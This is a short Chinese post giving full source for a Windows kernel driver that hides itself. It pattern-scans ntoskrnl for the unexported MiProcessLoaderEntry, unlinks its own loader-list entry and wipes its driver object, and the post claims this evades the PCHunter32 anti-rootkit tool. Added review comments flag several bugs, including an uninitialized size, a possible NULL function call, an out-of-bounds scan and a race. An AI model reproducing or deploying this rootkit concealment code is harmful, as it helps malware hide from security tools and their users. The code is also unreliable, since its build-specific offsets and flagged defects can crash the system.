参考文章:https://github.com/ZhuHuiBeiShaDiao/NewHideDriverEx
代码
#include<ntddk.h>
/*
 * Private copy of the (undocumented) loader record that the kernel keeps for
 * every loaded module. DriverObject->DriverSection is cast to this type below,
 * and the records are chained through InLoadOrderLinks.
 *
 * NOTE(review): the field layout is copied from the referenced project and is
 * build-specific; it is not verified anywhere in this file. Only
 * InLoadOrderLinks, DllBase, SizeOfImage and BaseDllName are actually read.
 */
typedef struct _LDR_DATA_TABLE_ENTRY
{
LIST_ENTRY InLoadOrderLinks; /* must remain the first member: threadRun stores a Flink (PLIST_ENTRY) straight into a PLDR_DATA_TABLE_ENTRY */
LIST_ENTRY InMemoryOrderLinks; /* not touched by this file */
LIST_ENTRY InInitializationOrderLinks; /* not touched by this file */
PVOID DllBase; /* image base; DriverEntry starts its byte-pattern scan here */
PVOID EntryPoint;
ULONG SizeOfImage; /* image size in bytes; bounds the scan in DriverEntry */
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName; /* compared case-insensitively against L"ntoskrnl.exe" in DriverEntry */
ULONG Flags;
USHORT LoadCount;
USHORT TlsIndex;
union
{
LIST_ENTRY HashLinks;
struct
{
PVOID SectionPointer;
ULONG CheckSum;
};
};
union
{
struct
{
ULONG TimeDateStamp;
};
struct
{
PVOID LoadedImports;
};
};
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
//双向链表结构 类型是驱动对象的成员DriverSection 把系统所有模块串接起来
//NTSYSAPI NTSTATUS ZwQuerySystemInformation(
// IN ULONG SystemInformationClass,
// IN OUT PVOID SystemInformation,
// IN ULONG SystemInformationLength,
// OUT PULONG ReturnLength OPTIONAL
//);
/*
 * Signature assumed for the unexported ntoskrnl routine MiProcessLoaderEntry.
 * NOTE(review): the meaning of Insert is inferred only from how this file
 * calls it (0 in DriverEntry, 1 in DriverUpload), not from any header.
 * The typedef name starts with '_' + uppercase, which is reserved for the
 * implementation in C.
 */
typedef VOID(*_MiProcessLoaderEntry)(IN PLDR_DATA_TABLE_ENTRY DataTableEntry, IN LOGICAL Insert);
/* Resolved at runtime by the byte-pattern scan in DriverEntry; stays NULL if
 * that scan finds nothing, yet it is still called unconditionally. */
_MiProcessLoaderEntry g_pfnMiProcessLoaderEntry = NULL;
/* Handle returned by PsCreateSystemThread in DriverEntry; closed from inside
 * threadRun, i.e. by the thread itself. */
HANDLE hThread;
/*
 * DriverUnload callback registered at the end of DriverEntry.
 * Calls MiProcessLoaderEntry with Insert = 1 on pDriver->DriverSection before
 * the kernel tears the driver down.
 *
 * NOTE(review): threadRun sets pDriver->DriverSection to NULL, so once that
 * thread has run the value passed here is NULL.
 * NOTE(review): the function is declared VOID but returns STATUS_SUCCESS;
 * a return with a value in a void function is not valid C.
 */
VOID DriverUpload(PDRIVER_OBJECT pDriver)
{
g_pfnMiProcessLoaderEntry((PLDR_DATA_TABLE_ENTRY)pDriver->DriverSection, 1);
KdPrint(("卸载的了")); /* debug text ("unloaded"); kept verbatim */
return STATUS_SUCCESS; /* value returned from a VOID function — see note above */
}
/*
 * Body of the system thread started from DriverEntry; StartContext is the
 * driver's own PDRIVER_OBJECT.
 *
 * What it does, as written:
 *  - zeroes DriverSize and NULLs the fields that describe the driver image
 *    and its entry points;
 *  - edits the InLoadOrderLinks of the driver's loader entry by hand (the
 *    other two LIST_ENTRY members of the entry are not modified here);
 *  - NULLs pDriver->DriverSection and closes the global thread handle.
 *
 * Defender note: afterwards the driver object carries DriverSize == 0 and
 * NULL DriverStart/DriverInit/DriverSection, an inconsistent state that is
 * itself observable when the object is inspected.
 */
VOID threadRun(_In_ PVOID StartContext)
{
//KdPrint(("开始执行1\n"));
/* Disabled delay before the work below (the original text had "&times"
 * mangled into an HTML entity). */
/*LARGE_INTEGER times;
times.QuadPart = -30 * 1000 * 1000;
KeDelayExecutionThread(KernelMode, FALSE, &times);*/
PDRIVER_OBJECT pDriver = (PDRIVER_OBJECT)StartContext;
pDriver->DriverSize = 0;
// Wipe the fields that identify the driver image and its entry points
pDriver->DriverExtension = NULL;
pDriver->DriverStart = NULL;
pDriver->DriverInit = NULL;
pDriver->FastIoDispatch = NULL;
pDriver->DriverStartIo = NULL;
// Hand-written edit of the InLoadOrderLinks list.
// Relies on InLoadOrderLinks being at offset 0 of LDR_DATA_TABLE_ENTRY: a
// PLIST_ENTRY (Flink) is stored into a PLDR_DATA_TABLE_ENTRY without a cast.
PLDR_DATA_TABLE_ENTRY pList = (PLDR_DATA_TABLE_ENTRY)pDriver->DriverSection;
PLDR_DATA_TABLE_ENTRY pCur = pList; // this driver's own loader entry
pList = pList->InLoadOrderLinks.Flink; // the entry after it
pList->InLoadOrderLinks.Blink = pCur->InLoadOrderLinks.Blink; // next->Blink = prev
pCur->InLoadOrderLinks.Flink = pList; // NOTE(review): rewrites pCur's own Flink with the value it already holds; the previous entry's Flink is not written
pDriver->DriverSection = NULL;
//KdPrint(("g_pfnMiProcessLoaderEntry=%p", g_pfnMiProcessLoaderEntry));
ZwClose(hThread); // closes the handle that PsCreateSystemThread stored in the global
}
/*
 * Driver entry point. pReg is unused.
 *
 * Steps, as written:
 *  1. Walk the loader list from this driver's own entry (pDriver->DriverSection)
 *     until the entry whose BaseDllName equals L"ntoskrnl.exe" (case-insensitive)
 *     is found; keep its DllBase and image size (`end`).
 *  2. Scan that image for a fixed 12-byte pattern and take the address
 *     178 bytes before the match as MiProcessLoaderEntry.
 *  3. Start a system thread (threadRun) that wipes the driver object, then call
 *     MiProcessLoaderEntry(entry, 0) on this driver's own loader entry.
 *  4. Register DriverUpload as DriverUnload.
 *
 * NOTE(review): `end` is assigned only when ntoskrnl.exe is matched; if the walk
 * completes without a match, `end` is read uninitialized and
 * g_pfnMiProcessLoaderEntry is still NULL when it is called at the bottom.
 * NOTE(review): Data[] has 12 bytes but the inner loop compares 11, and on the
 * last outer iterations the scan reads up to 10 bytes beyond DllBase + SizeOfImage.
 * NOTE(review): the (int) pointer arithmetic and the fixed -178 offset assume a
 * 32-bit build of one specific kernel; the page only reports a test on PCHunter32.
 * NOTE(review): PsCreateSystemThread's status is ignored, and nothing orders
 * threadRun (which NULLs DriverSection) against the MiProcessLoaderEntry call
 * that follows it — the argument seen by that call depends on scheduling.
 *
 * Defender note: DbgPrint("pOrg=%p") writes the kernel image base to the kernel
 * debug output; the loader-list walk, the pattern scan over ntoskrnl, and the
 * wiped driver object are the observable artifacts of this code.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriver, PUNICODE_STRING pReg)
{
// Locate the ntoskrnl.exe base address via the loader list
PLDR_DATA_TABLE_ENTRY pLdr = NULL;
PLIST_ENTRY pListEntry = NULL;
PLIST_ENTRY pCurrentListEntry = NULL;
PLDR_DATA_TABLE_ENTRY pCurrentModule = NULL;
pLdr = (PLDR_DATA_TABLE_ENTRY)pDriver->DriverSection; // this driver's own entry
pListEntry = pLdr->InLoadOrderLinks.Flink; // start of the walk
pCurrentListEntry = pListEntry->Flink;
UNICODE_STRING temp;
RtlInitUnicodeString(&temp, L"ntoskrnl.exe");
int end; // image size of ntoskrnl; only assigned on the match path (see note above)
while (pCurrentListEntry != pListEntry) // stop once the circular walk returns to its start
{
// Recover the LDR_DATA_TABLE_ENTRY from its InLoadOrderLinks member
pCurrentModule = CONTAINING_RECORD(pCurrentListEntry, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
if (pCurrentModule->BaseDllName.Buffer != 0)
{
if (!RtlCompareUnicodeString(&pCurrentModule->BaseDllName, &temp, TRUE)) // 0 means equal
{
//DbgPrint("ModuleName = %wZ ModuleBase = %p ModuleEndBase = %p\r\n",
/*&pCurrentModule->BaseDllName,
pCurrentModule->DllBase,
(int)pCurrentModule->DllBase + pCurrentModule->SizeOfImage);*/
g_pfnMiProcessLoaderEntry= pCurrentModule->DllBase; // temporarily holds the image base, not the function
end=(int)pCurrentModule->DllBase + pCurrentModule->SizeOfImage;
end -=(int)pCurrentModule->DllBase; // the DllBase terms cancel: end == SizeOfImage
// DbgPrint("end = %d ,g_pfnMiProcessLoaderEntry=%p", end, g_pfnMiProcessLoaderEntry);
break;
}
}
pCurrentListEntry = pCurrentListEntry->Flink;
}
// 12-byte pattern, compared as plain char on both sides (0x8b etc. wrap identically)
char Data[] = { 0x8b,0x03,0x8b,0x4b,0x04,0x89,0x01,0x89,0x48,0x04,0x33,0xc0};
// Search the ntoskrnl image for the MiProcessLoaderEntry byte pattern
char *pOrg = g_pfnMiProcessLoaderEntry; // at this point: ntoskrnl's DllBase (set in the loop above)
DbgPrint("pOrg=%p", pOrg);
char *pPare;
int i, j;
for (i = 0; i < end; i++)
{
pPare = pOrg + i;
for (j = 0; j < 11; j++) // compares only the first 11 of the 12 pattern bytes
{
if (pPare[j] != Data[j])
{
break;
}
}
// Matched
if (j == 11)
{
//DbgPrint("pPare=%p", pPare- 178);
g_pfnMiProcessLoaderEntry = pPare- 178; // fixed, build-specific distance from the match to the function start
break;
}
}
PsCreateSystemThread(&hThread, GENERIC_ALL, NULL, NULL, NULL, threadRun, pDriver); // status not checked; handle lands in the global hThread
g_pfnMiProcessLoaderEntry((PLDR_DATA_TABLE_ENTRY)pDriver->DriverSection, 0); // Insert = 0 on this driver's own entry; NULL if the scan failed
pDriver->DriverUnload = DriverUpload;
return STATUS_SUCCESS;
}
实测已过PCHunter32 无法过火绒剑